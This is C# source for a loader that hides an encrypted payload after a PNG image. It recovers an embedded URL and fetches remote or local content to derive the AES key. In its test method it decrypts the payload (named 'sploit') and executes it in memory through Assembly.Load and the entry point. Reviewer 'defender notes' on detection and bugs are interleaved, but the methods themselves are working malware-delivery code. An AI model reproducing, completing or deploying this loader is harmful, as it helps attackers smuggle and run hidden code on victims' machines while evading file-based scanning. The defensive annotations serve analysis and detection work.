// stub_launch: recovers the payload bytes embedded after a PNG image.
//
// Steps visible in this method:
//   1. Take everything in url_data from png_offset to the end.
//   2. base64-decode it, then decompress it (both helpers defined elsewhere).
//   3. The first two bytes of the result are a little-endian 16-bit length; that many
//      bytes are an encrypted URL, decrypted with enc_pass and the fixed salt below.
//   4. The URL is either read as a local file or fetched over the network (get_page).
//   5. hash_page() turns that content into master_pass; slices of it become the AES
//      key (pass) and IV (pass_4); the remaining bytes are AES-decrypted and returned.
//
// Parameters:
//   url_data    - bytes of the carrier file (the PNG plus appended data).
//   enc_pass    - password used by Enc.decrypt_small_pass to recover the URL.
//   png_offset  - index in url_data where the appended base64 data begins.
//   pass_offset - passed straight through to hash_page; meaning not visible here.
// Returns: the decrypted payload bytes.
//
// Defender notes (review):
//   - The salt is a hard-coded constant and the length prefix is unauthenticated, so
//     the format itself is a stable static indicator; the decryption key, however, is
//     derived at runtime from external content (a file or a web page), which is the
//     point at which the behaviour becomes observable (file read / outbound request
//     followed by decrypt). The caller that loads the result is outside this method.
//   - No bounds checks: nn may exceed enc_data.Length - 2, and enc_data may be shorter
//     than 2 bytes; Array.Copy / the indexer throw in those cases rather than failing
//     cleanly. Likewise a png_offset past url_data.Length makes the first allocation
//     throw.
//   - Enc.*, base64_decode, decompress_bin, test_file, get_page and hash_page are
//     defined elsewhere; their exact semantics are not verifiable from this file.
public static byte[] stub_launch(byte[] url_data, string enc_pass, int png_offset, int pass_offset)
{
    // this was NOT easy.
    // Fixed, non-random salt shared with test_everything. //change (author's own TODO)
    Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
    // Slice off the appended data (everything after the image proper).
    Byte[] b64_data_only = new Byte[url_data.Length - png_offset];
    Buffer.BlockCopy(url_data, png_offset, b64_data_only, 0, url_data.Length - png_offset);
    Byte[] comp_data = base64_decode(b64_data_only);
    Byte[] enc_data = decompress_bin(comp_data);
    // Little-endian UInt16 length of the encrypted URL that follows; not range-checked.
    int nn = enc_data[0] + (enc_data[1] << 8);
    Byte[] enc_pre_pass = new Byte[nn];
    Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
    Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
    // depadit presumably strips padding added by the encryptor — TODO confirm in Enc.
    Byte[] url_pass = Enc.depadit(decrypted_url_pass);
    // Payload ciphertext starts right after the 2-byte length and the URL block.
    int enc_data_offset = enc_pre_pass.Length + 2;
    String nurl = Encoding.UTF8.GetString(url_pass);
    // Key material source: a local file if test_file() says so, otherwise a network fetch.
    Byte[] enc_page;
    if (test_file(nurl)) { enc_page = File.ReadAllBytes(nurl); } else { enc_page = get_page(nurl); }
    Byte[] master_pass = hash_page(enc_page, pass_offset);
    // pass (32 bytes) <- master_pass[len/4 .. len/4 + len/2); pass_4 (16 bytes) <- master_pass[len/8 .. len/8 + len/4).
    // These copies only fit if master_pass is exactly 64 bytes — TODO confirm hash_page's output size;
    // any other length makes Array.Copy throw.
    Byte[] pass = new Byte[0x20];
    Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
    Byte[] pass_4 = new Byte[0x10];
    Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
    Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset];
    Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
    // AES mode and padding are decided inside Enc.aes_decrypt; no authentication tag is checked here.
    Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); //moneyshot
    return(decrypted_sploit_bytes);
}
// test our final image to verify it's working!
//
// test_everything: self-test of a generated carrier file. It repeats the same
// extract -> base64-decode -> decompress -> decrypt-URL -> fetch -> derive key/IV ->
// AES-decrypt sequence as stub_launch (with debug output at each stage), then loads
// the decrypted bytes as a .NET assembly with Assembly.Load and invokes its entry point.
//
// Parameters:
//   output_file   - path of the carrier file to read back.
//   enc_pass      - password for Enc.decrypt_small_pass (URL decryption).
//   offset        - passed through to hash_page; meaning not visible here.
//   b64_test      - unused in this method.
//   main_args     - this program's argv; everything after the first element is
//                   forwarded to the loaded assembly.
//   code_position - index in the file where the appended base64 data starts.
//
// Defender notes (review):
//   - Assembly.Load(byte[]) followed by EntryPoint.Invoke is an in-memory load of code
//     that never touched disk in its final form; runtime assembly-load telemetry (rather
//     than file scanning) is where this step is visible. It is also the only place in
//     this file where decrypted bytes are executed.
//   - a.CreateInstance(method.Name) passes the entry-point METHOD's name where
//     CreateInstance expects a TYPE name, so o is null unless a type happens to carry
//     that name; Invoke then runs the entry point with a null target, which only works
//     for a static entry point. Behaviour left as-is.
//   - new String[main_args.Length - 1] throws if main_args is empty; nothing guards it.
//   - The catch (Exception) only prints; failures inside the loaded code are swallowed
//     into console output.
//   - Same unchecked length prefix / hard-coded salt / external key source caveats as
//     stub_launch apply.
public static void test_everything(string output_file, string enc_pass, int offset, byte[] b64_test, string[] main_args, int code_position)
{
    // Same fixed salt as stub_launch; must match whatever produced the file.
    Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
    Console.WriteLine("We are debugging it to make sure everything works properly!");
    Byte[] enc_testdata = File.ReadAllBytes(output_file);
    //int pos = do_png(enc_testdata);
    //pos = pos + 37; // header length is 37
    // Start of the appended data is supplied by the caller instead of being re-parsed from the PNG.
    int pos = code_position;
    Byte[] b64_data_only = new Byte[enc_testdata.Length - pos];
    Buffer.BlockCopy(enc_testdata, pos, b64_data_only, 0, enc_testdata.Length - pos);
    debug_print("TESTING, base64 data {0}", b64_data_only);
    Byte[] comp_data = base64_decode(b64_data_only);
    Byte[] enc_data = decompress_bin(comp_data);
    // the length of the url, stored as Int16 (little-endian); not range-checked against enc_data.Length
    int nn = enc_data[0] + (enc_data[1] << 8);
    Byte[] enc_pre_pass = new Byte[nn];
    Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
    Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
    Byte[] url_pass = Enc.depadit(decrypted_url_pass);
    // the offset is our enc data minus the url (2-byte length + URL block)
    int enc_data_offset = enc_pre_pass.Length + 2;
    String nurl = Encoding.UTF8.GetString(url_pass);
    // get file or webpage for encryption: this content, not enc_pass, is the source of the AES key
    Byte[] enc_page;
    if (test_file(nurl)) { enc_page = File.ReadAllBytes(nurl); } else { enc_page = get_page(nurl); }
    Byte[] master_pass = hash_page(enc_page, offset);
    debug_print("Our testing master_pass {0}", master_pass);
    // I HATE doing it like this but meh...
    // Key = middle half of master_pass, IV = second eighth-to-three-eighths slice; fits only if
    // master_pass is 64 bytes — TODO confirm hash_page's output size.
    Byte[] pass = new Byte[0x20];
    Byte[] pass_4 = new Byte[0x10];
    Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
    Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
    // Debug output below writes the key and IV to the console.
    debug_print("Password Is: {0}", pass);
    debug_print("The IV Is: {0}", pass_4);
    Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset];
    // get ready for the money shot
    Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
    Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4);
    debug_print("Our encrypted file is: {0}", decrypted_sploit_bytes);
    Console.WriteLine("Everything should have worked, loading the binary.");
    // load the bytes into Assembly (in-memory load; no file is written)
    Assembly a = Assembly.Load(decrypted_sploit_bytes);
    // search for the Entry Point
    MethodInfo method = a.EntryPoint;
    if (method != null)
    {
        // GlobalAssemblyCache <-- ???? (author's note, left as-is)
        // create an istance of the Startup form Main method
        // NOTE(review): CreateInstance takes a type name; method.Name is the entry-point method's
        // name, so this is normally null and the Invoke below relies on the entry point being static.
        Object o = a.CreateInstance(method.Name);
        // copy main_args into new array, to use in object
        // Throws if main_args is empty (negative array size).
        String[] prog_args = new String[main_args.Length - 1]; // adjust this if we use more args!
        Array.Copy(main_args, 1, prog_args, 0, main_args.Length - 1);
        try
        {
            // invoke the application starting point
            method.Invoke(o, new Object[] { prog_args });
        }
        catch (Exception e)
        {
            // Broad catch: any failure from the loaded code is only printed.
            Console.WriteLine(e);
        }
    }
}